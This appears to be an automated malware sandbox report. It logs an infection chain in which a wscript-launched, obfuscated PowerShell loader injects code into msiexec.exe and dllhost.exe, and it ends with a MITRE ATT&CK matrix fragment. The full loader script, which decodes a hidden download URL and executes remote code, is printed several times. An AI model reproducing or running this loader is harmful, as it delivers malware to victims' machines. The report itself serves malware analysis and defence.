              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeSection loaded: NULL target: C:\Windows\SysWOW64\dllhost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: NULL target: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: NULL target: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2E00000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exeProcess created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\SysWOW64\dllhost.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#bishoping kropsvisitering privateje espying genes gossipingly #>;$scarifies117='sammensnredes';<#barometriske sardanapalian customiser miljteknikeren unwritten #>;$abovedeck=$autografsamlers+$host.ui; function plumet($pendultrafik){if ($abovedeck) {$beedigelsers++;}$superinsistently=$proelectric+$pendultrafik.'length'-$beedigelsers; for( $melolonthine=5;$melolonthine -lt $superinsistently;$melolonthine+=6){$swiveleye=$melolonthine;$warks+=$pendultrafik[$melolonthine];$unconservatively='mongolism';}$warks;}function extralegal($bostter){ & ($forfdrenes) ($bostter);}$reservationsslipper=plumet 'wgstrmboyarokujonzcorpsirediglfo melnon,oabened/mah r ';$reservationsslipper+=plumet 'lsesu5knubs. cl p0tidv. s til(.esknw indii rosn lyindflaunokoncewaugmespanto reknonhvekotfila kniks1dolkh0apnea. ilja0quali;b lki hjallw,plinir facn g.no6r,lak4zygne;glend retrxassur6bibli4s.ear; mask camstrrekorv taxi:ensky1udste3nob l1tempt.hamar0del b)perp pharmgunbusenyas,c ontok aurioemitt/kofan2udrik0indig1 plug0ove,f0 resp1godke0fiske1bicyc frerf econi .ermrrek.neagatefn touo.ulfaxtenni/,rriv1 d ta3ind.u1knapp.vin.i0fldei ';$feriegiroens=plumet 'vankeu ba ysdiarte stanrhaand- am aakartog gr se alannberustoleac ';$halmknippernes=plumet ' astahbaglyt kon tstripp.attlsk.teg:glade/bet l/pr mudvampertelexi derivg usceduple.spillgodorsohebraokupingin talstrikesla.e. vi ecsamenob,rbim ngle/ elemu,rfevcdress?a rile in.uxo scuptympaopaastrreroltaerop=sponsdtangio sidewcondon.ivilltilkmoki.ofavarsedunm.n&bluebigainlddisgu=u,der1katsuqsamsi6udtagcperfeyt end4me ryofarveurepartallobc cu lolact.u anve- bil.a skypv shinhlargiawhisk3 goom_unin v baffuleftiuceritu gallrkredifrisikoemb oonavewb agesqkanurcharanrdaghod cod 8touch ';$unpredicableness=plumet 'rvert>oshac ';$forfdrenes=plumet 'elu iiren.eedisruxpreda ';$melolonthinetalianation='synentognath';$klagen142='\gesjftigere.sig';extralegal (plumet ' kant$ gestg,opovlafrivo gar bafkrya nil lf rpe:acculscounttfederetabulnsubeno hoo tunvityu,eskp begrik prosexcertsoun.=ut,li$spencerascanshittvba uq:czecha knuspgerrhp.ositdfefniacor ntupdivapilsn+stf,o$statukbort lbytniau calg.ubsiefolkenkosmo1af,ik4t att2 vacc ');extralegal (plumet 'ekstr$time grenegltriesoparjrbev gha photlopt d:nonrek h veaanatol concltha lienslaganti rso staf,ypafrokkeiperig= b un$botchhbl frashriml mentmcitroks,ntin ammeioverpp arplpautheeeuroprtankenbiko,etildnscong .angorsr velpspattlpredei handtkl,ss( svag$opholustrafn vasop mosarprimaenor idraa lislutdcdicala unmebskravlfeas,einf rndr tte lamaspre.oshandl)carra ');extralegal (plumet 'kofil[replanbestresuppetdovec.skattsvarieeforklr entevh,andieu ogcopm ge ussp sociodeuteistud,nhundetrhabdm blseavivi.n udnva anarg,istieabomarprear]ung d:chond: u bysvinylebirkec fi mugavagrrevanizo.retsistsyplastpoptimrmaleno decrteks.oo ,ncachal hojereel wame premu=degra enspn[ u buna omae libatun
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#bishoping kropsvisitering privateje espying genes gossipingly #>;$scarifies117='sammensnredes';<#barometriske sardanapalian customiser miljteknikeren unwritten #>;$abovedeck=$autografsamlers+$host.ui; function plumet($pendultrafik){if ($abovedeck) {$beedigelsers++;}$superinsistently=$proelectric+$pendultrafik.'length'-$beedigelsers; for( $melolonthine=5;$melolonthine -lt $superinsistently;$melolonthine+=6){$swiveleye=$melolonthine;$warks+=$pendultrafik[$melolonthine];$unconservatively='mongolism';}$warks;}function extralegal($bostter){ & ($forfdrenes) ($bostter);}$reservationsslipper=plumet 'wgstrmboyarokujonzcorpsirediglfo melnon,oabened/mah r ';$reservationsslipper+=plumet 'lsesu5knubs. cl p0tidv. s til(.esknw indii rosn lyindflaunokoncewaugmespanto reknonhvekotfila kniks1dolkh0apnea. ilja0quali;b lki hjallw,plinir facn g.no6r,lak4zygne;glend retrxassur6bibli4s.ear; mask camstrrekorv taxi:ensky1udste3nob l1tempt.hamar0del b)perp pharmgunbusenyas,c ontok aurioemitt/kofan2udrik0indig1 plug0ove,f0 resp1godke0fiske1bicyc frerf econi .ermrrek.neagatefn touo.ulfaxtenni/,rriv1 d ta3ind.u1knapp.vin.i0fldei ';$feriegiroens=plumet 'vankeu ba ysdiarte stanrhaand- am aakartog gr se alannberustoleac ';$halmknippernes=plumet ' astahbaglyt kon tstripp.attlsk.teg:glade/bet l/pr mudvampertelexi derivg usceduple.spillgodorsohebraokupingin talstrikesla.e. vi ecsamenob,rbim ngle/ elemu,rfevcdress?a rile in.uxo scuptympaopaastrreroltaerop=sponsdtangio sidewcondon.ivilltilkmoki.ofavarsedunm.n&bluebigainlddisgu=u,der1katsuqsamsi6udtagcperfeyt end4me ryofarveurepartallobc cu lolact.u anve- bil.a skypv shinhlargiawhisk3 goom_unin v baffuleftiuceritu gallrkredifrisikoemb oonavewb agesqkanurcharanrdaghod cod 8touch ';$unpredicableness=plumet 'rvert>oshac ';$forfdrenes=plumet 'elu iiren.eedisruxpreda ';$melolonthinetalianation='synentognath';$klagen142='\gesjftigere.sig';extralegal (plumet ' kant$ gestg,opovlafrivo gar bafkrya nil lf rpe:acculscounttfederetabulnsubeno hoo tunvityu,eskp begrik prosexcertsoun.=ut,li$spencerascanshittvba uq:czecha knuspgerrhp.ositdfefniacor ntupdivapilsn+stf,o$statukbort lbytniau calg.ubsiefolkenkosmo1af,ik4t att2 vacc ');extralegal (plumet 'ekstr$time grenegltriesoparjrbev gha photlopt d:nonrek h veaanatol concltha lienslaganti rso staf,ypafrokkeiperig= b un$botchhbl frashriml mentmcitroks,ntin ammeioverpp arplpautheeeuroprtankenbiko,etildnscong .angorsr velpspattlpredei handtkl,ss( svag$opholustrafn vasop mosarprimaenor idraa lislutdcdicala unmebskravlfeas,einf rndr tte lamaspre.oshandl)carra ');extralegal (plumet 'kofil[replanbestresuppetdovec.skattsvarieeforklr entevh,andieu ogcopm ge ussp sociodeuteistud,nhundetrhabdm blseavivi.n udnva anarg,istieabomarprear]ung d:chond: u bysvinylebirkec fi mugavagrrevanizo.retsistsyplastpoptimrmaleno decrteks.oo ,ncachal hojereel wame premu=degra enspn[ u buna omae libatun
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#bishoping kropsvisitering privateje espying genes gossipingly #>;$scarifies117='sammensnredes';<#barometriske sardanapalian customiser miljteknikeren unwritten #>;$abovedeck=$autografsamlers+$host.ui; function plumet($pendultrafik){if ($abovedeck) {$beedigelsers++;}$superinsistently=$proelectric+$pendultrafik.'length'-$beedigelsers; for( $melolonthine=5;$melolonthine -lt $superinsistently;$melolonthine+=6){$swiveleye=$melolonthine;$warks+=$pendultrafik[$melolonthine];$unconservatively='mongolism';}$warks;}function extralegal($bostter){ & ($forfdrenes) ($bostter);}$reservationsslipper=plumet 'wgstrmboyarokujonzcorpsirediglfo melnon,oabened/mah r ';$reservationsslipper+=plumet 'lsesu5knubs. cl p0tidv. s til(.esknw indii rosn lyindflaunokoncewaugmespanto reknonhvekotfila kniks1dolkh0apnea. ilja0quali;b lki hjallw,plinir facn g.no6r,lak4zygne;glend retrxassur6bibli4s.ear; mask camstrrekorv taxi:ensky1udste3nob l1tempt.hamar0del b)perp pharmgunbusenyas,c ontok aurioemitt/kofan2udrik0indig1 plug0ove,f0 resp1godke0fiske1bicyc frerf econi .ermrrek.neagatefn touo.ulfaxtenni/,rriv1 d ta3ind.u1knapp.vin.i0fldei ';$feriegiroens=plumet 'vankeu ba ysdiarte stanrhaand- am aakartog gr se alannberustoleac ';$halmknippernes=plumet ' astahbaglyt kon tstripp.attlsk.teg:glade/bet l/pr mudvampertelexi derivg usceduple.spillgodorsohebraokupingin talstrikesla.e. vi ecsamenob,rbim ngle/ elemu,rfevcdress?a rile in.uxo scuptympaopaastrreroltaerop=sponsdtangio sidewcondon.ivilltilkmoki.ofavarsedunm.n&bluebigainlddisgu=u,der1katsuqsamsi6udtagcperfeyt end4me ryofarveurepartallobc cu lolact.u anve- bil.a skypv shinhlargiawhisk3 goom_unin v baffuleftiuceritu gallrkredifrisikoemb oonavewb agesqkanurcharanrdaghod cod 8touch ';$unpredicableness=plumet 'rvert>oshac ';$forfdrenes=plumet 'elu iiren.eedisruxpreda ';$melolonthinetalianation='synentognath';$klagen142='\gesjftigere.sig';extralegal (plumet ' kant$ gestg,opovlafrivo gar bafkrya nil lf rpe:acculscounttfederetabulnsubeno hoo tunvityu,eskp begrik prosexcertsoun.=ut,li$spencerascanshittvba uq:czecha knuspgerrhp.ositdfefniacor ntupdivapilsn+stf,o$statukbort lbytniau calg.ubsiefolkenkosmo1af,ik4t att2 vacc ');extralegal (plumet 'ekstr$time grenegltriesoparjrbev gha photlopt d:nonrek h veaanatol concltha lienslaganti rso staf,ypafrokkeiperig= b un$botchhbl frashriml mentmcitroks,ntin ammeioverpp arplpautheeeuroprtankenbiko,etildnscong .angorsr velpspattlpredei handtkl,ss( svag$opholustrafn vasop mosarprimaenor idraa lislutdcdicala unmebskravlfeas,einf rndr tte lamaspre.oshandl)carra ');extralegal (plumet 'kofil[replanbestresuppetdovec.skattsvarieeforklr entevh,andieu ogcopm ge ussp sociodeuteistud,nhundetrhabdm blseavivi.n udnva anarg,istieabomarprear]ung d:chond: u bysvinylebirkec fi mugavagrrevanizo.retsistsyplastpoptimrmaleno decrteks.oo ,ncachal hojereel wame premu=degra enspn[ u buna omae libatunJump to behavior
              Source: nJPhzxOixucOn.exe, 0000000A.00000002.2966048135.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000000.2702846325.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000000.2869395888.0000000000FE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: nJPhzxOixucOn.exe, 0000000A.00000002.2966048135.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000000.2702846325.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000000.2869395888.0000000000FE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: nJPhzxOixucOn.exe, 0000000A.00000002.2966048135.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000000.2702846325.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000000.2869395888.0000000000FE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: nJPhzxOixucOn.exe, 0000000A.00000002.2966048135.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000000.2702846325.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000000.2869395888.0000000000FE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              11
              Scripting
              412
              Process Injection
              1
              Masquerading
              OS Credential Dumping21
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts22
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              Abuse Elevation Control Mechanism
              31
              Virtualization/Sandbox Evasion
